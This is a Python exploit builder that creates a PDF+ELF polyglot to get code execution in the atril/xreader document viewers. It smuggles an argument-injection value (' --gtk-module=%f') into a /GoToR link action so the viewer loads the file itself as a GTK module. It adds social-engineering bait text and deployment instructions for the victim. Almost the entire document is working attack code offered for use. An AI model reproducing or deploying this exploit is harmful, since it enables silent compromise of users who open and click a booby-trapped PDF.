#!/usr/bin/env python3 """ build_polyglot.py — produce a PDF+ELF polyglot exploiting the atril/xreader /GoToR argv-injection bug for zero-knowledge RCE. THE TRICK --------- The dlopen target path is NOT hardcoded in the PDF. Instead, the smuggled /D field contains glib's `%f` macro: /D = " --gtk-module=%f" When the user clicks the link annotation, atril builds the spawn cmdline, hands it to g_app_info_create_from_commandline + g_app_info_launch_uris, and glib substitutes `%f` with the local path of the URI computed at runtime from /F. The spawned child receives: --gtk-module= dlopen succeeds because the path IS the polyglot's real location, which atril discovered itself via g_path_get_dirname(source_uri) + /F.basename. The attacker only needs to know the filename. No directory, no username, no $HOME, no working directory, no download path knowledge required. ONE QUIRK --------- ev_application_open_uri_at_dest() short-circuits and just navigates (instead of spawning) when the resolved /F URI equals the source URI. To force the spawn we append a harmless query string to /F: /F = "?1" The query string makes the URI distinct from the source. glib's g_filename_from_uri strips the query when building `%f`, so the dlopen target is still the clean path. Usage ----- python3 build_polyglot.py [INPUT_SO] [OUTPUT_PDF] Defaults -------- INPUT_SO = ./evil.so OUTPUT_PDF = ./polyglot.pdf The basename embedded in /F is taken from the output filename. The polyglot must be deployed on the victim with the same basename — the directory does not matter, atril resolves it at runtime. """ import sys import zlib import pathlib SO_INPUT = sys.argv[1] if len(sys.argv) > 1 else "./evil.so" OUT_FILE = sys.argv[2] if len(sys.argv) > 2 else "./polyglot.pdf" BASENAME = pathlib.Path(OUT_FILE).name elf = bytearray(pathlib.Path(SO_INPUT).read_bytes()) print(f"[+] read ELF: {len(elf)} bytes from {SO_INPUT}") def find_build_id_offset(blob): """ Locate the .note.gnu.build-id descriptor (20-byte SHA1 slot). Note layout: namesz(4) descsz(4) type(4) name("GNU\\0") desc(SHA1, 20). We find the "GNU\\0" name and verify type=3 (NT_GNU_BUILD_ID), descsz=20 sit immediately before it. The descriptor starts 4 bytes after the name (name is 4-byte aligned). """ pos = 0 while True: idx = blob.find(b"GNU\x00", pos) if idx < 0 or idx < 12: return None descsz = int.from_bytes(blob[idx-8:idx-4], "little") ntype = int.from_bytes(blob[idx-4:idx], "little") if descsz == 20 and ntype == 3: return idx + 4 pos = idx + 4 STAMP_OFFSET = find_build_id_offset(elf) if STAMP_OFFSET is None: raise SystemExit( "[!] no .note.gnu.build-id with SHA1 descsz=20 found in ELF.\n" " Recompile evil.so with:\n" " gcc -shared -fPIC -Wl,--build-id=sha1 \\\n" " -o evil.so evil_gtk_module.c\n" " The build-id note is the slot we overwrite with %PDF-1.4." ) if STAMP_OFFSET >= 1024: raise SystemExit( f"[!] build-id at 0x{STAMP_OFFSET:x} is past poppler's 1024-byte " f"%PDF- scan window; polyglot would not parse as PDF" ) print(f"[+] build-id descriptor at file offset 0x{STAMP_OFFSET:x}") # Stamp %PDF-1.4 inside the descriptor. The 20-byte slot is informational; # ld.so does not validate the SHA1 contents. elf[STAMP_OFFSET:STAMP_OFFSET+9] = b"%PDF-1.4\n" elf[STAMP_OFFSET+9:STAMP_OFFSET+20] = b"\x00" * 11 print(f"[+] stamped %PDF-1.4 at offset 0x{STAMP_OFFSET:x}") # All PDF xref offsets are encoded relative to the %PDF- marker so that # both legacy poppler (absolute) and modern poppler (relative-from-%PDF) # resolve them correctly. PDF_BASE = STAMP_OFFSET pdf_start_offset = len(elf) # /F: basename + "?1" forces distinct URI vs source (spawns instead of # navigating). glib strips the query when building %f. F_FIELD = f"{BASENAME}?1" # /D: smuggled argv injection. Leading space causes g_shell_parse_argv # to emit "--gtk-module=%f" as a standalone argv element. glib's # launch_uris substitutes %f with the runtime-resolved local path. SMUGGLE = " --gtk-module=%f" print(f"[+] /F = {F_FIELD!r}") print(f"[+] /D = {SMUGGLE!r}") objs = [] def add_obj(body): objs.append(body) return len(objs) add_obj(b"<< /Type /Catalog /Pages 2 0 R >>") add_obj(b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>") add_obj(b"""<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 6 0 R /Resources << /Font << /F1 7 0 R >> >> /Annots [4 0 R] >>""") add_obj(b"""<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /Border [0 0 0] /A 5 0 R >>""") add_obj( b"<< /Type /Action /S /GoToR /F << /Type /Filespec /F (" + F_FIELD.encode("latin-1") + b") >> /D (" + SMUGGLE.encode("latin-1") + b") >>" ) # Object 6: Content stream with bait text visible = ( b"q 1 0 0 1 60 720 cm BT /F1 18 Tf " b"(IMPORTANT - read this document) Tj 0 -28 Td " b"/F1 14 Tf (Click anywhere on the page to view appendix.) Tj ET Q" ) visible_z = zlib.compress(visible) add_obj( b"<< /Length " + str(len(visible_z)).encode() + b" /Filter /FlateDecode >>\nstream\n" + visible_z + b"\nendstream" ) add_obj(b"<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>") # Serialize PDF body with relative xref offsets pdf_body = bytearray() offsets = [] for i, body in enumerate(objs, 1): abs_off = pdf_start_offset + len(pdf_body) rel_off = abs_off - PDF_BASE offsets.append(rel_off) pdf_body += f"{i} 0 obj\n".encode() + body + b"\nendobj\n" xref_rel_off = (pdf_start_offset + len(pdf_body)) - PDF_BASE pdf_body += f"xref\n0 {len(objs)+1}\n".encode() pdf_body += b"0000000000 65535 f \n" for off in offsets: pdf_body += f"{off:010d} 00000 n \n".encode() pdf_body += f"trailer\n<< /Size {len(objs)+1} /Root 1 0 R >>\n".encode() pdf_body += f"startxref\n{xref_rel_off}\n%%EOF\n".encode() polyglot = bytes(elf) + bytes(pdf_body) pathlib.Path(OUT_FILE).write_bytes(polyglot) print(f"[+] wrote {OUT_FILE} ({len(polyglot)} bytes)") print(f" ELF prefix : {len(elf)} bytes") print(f" PDF body : {len(pdf_body)} bytes") print(f"") print(f"[!] IMPORTANT: deploy this file with basename {BASENAME!r}.") print(f" The directory does NOT matter — atril resolves it at runtime.")